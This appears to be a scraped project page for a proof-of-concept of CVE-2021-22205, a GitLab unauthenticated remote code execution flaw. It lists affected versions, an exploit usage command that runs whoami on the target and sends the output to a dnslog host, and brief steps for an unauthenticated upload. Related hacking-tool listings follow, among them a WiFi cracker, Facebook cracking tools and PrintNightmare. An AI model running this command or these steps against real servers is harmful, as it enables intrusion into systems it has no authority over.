CVE-2021-22205 Unauthorized RCE

Last update: Nov 09, 2022

Overview

CVE-2021-22205

影响版本：

Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8

Usage

python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

获取csrf-token：

通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求，最终rce

ref:

Owner

r0eXpeR

"alera(/'xs‘/)

GitHub Repository

This repository consists of the python scripts for execution and automation of vivid tasks.

Scripting.py is a repository being maintained to keep log of the python scripts that I create for automating and executing some of my boring manual task.

1 Feb 07, 2022

This tool ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information that allows them to know in advance if this library complies with processes.

This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their codes, providing information

66 Nov 08, 2022

CVE-2022-21907 Vulnerability PoC

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17, just some sm

16 Dec 18, 2022

Kunyu, more efficient corporate asset collection

Kunyu(坤舆) - More efficient corporate asset collection English | 中文文档 0x00 Introduce Tool introduction Kunyu (kunyu), whose name is taken from , is act

772 Jan 05, 2023

Log4j rce test environment and poc

log4jpwn log4j rce test environment See: https://www.lunasec.io/docs/blog/log4j-zero-day/ Experiments to trigger in various software products mentione

307 Dec 24, 2022

This program is a WiFi cracker, you can test many passwords for a desired wifi to find the wifi password!

WiFi_Cracker About the Program: This program is a WiFi cracker! Just run code and select a desired wifi to start cracking 💣 Note: you can use this pa

13 Dec 08, 2022

Omega - From Wordpress admin to pty

The Linux tool to automate the process of getting a pty once you got admin credentials in a Wordpress site. Keep in mind that right now Omega only can attack Linux hosts.

12 Nov 09, 2022

Osint-Tool - Information collection tool in python

Osint-Tool Herramienta para la recolección de información Pronto más opciones In

3 Apr 09, 2022

IDA Python Script for anti ollvm

62 Dec 23, 2022

Tools Crack Fb Terbaru

12 Jan 06, 2022

Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods

Time Discretization-Invariant Safe Action Repetition for Policy Gradient Methods This repository is the official implementation of Seohong Park, Jaeky

6 Aug 02, 2022

Searches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances of log4j library, including embedded (jar/war/zip) packaged ones.

33 Jan 04, 2023

Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket

140 Dec 27, 2022

一款辅助探测Orderby注入漏洞的BurpSuite插件，Python3编写，适用于上xray等扫描器被ban的场景

OrderbyHunter 一款辅助探测Orderby注入漏洞的BurpSuite插件，Python3编写，适用于上xray等扫描器被ban的场景 1. 支持Get/Post型请求参数的探测，被动探测，对于存在Orderby注入的请求将会在HTTP Histroy里标红 2. 自定义排序参数list

21 Aug 12, 2022

♻️ Password Generator (PSG) 📚 This plugin is made for more familiarity with Python, but can also be used to create passwords

About Tool This plugin is made for more familiarity with Python, but can also be used to create passwords.

2 Jul 23, 2022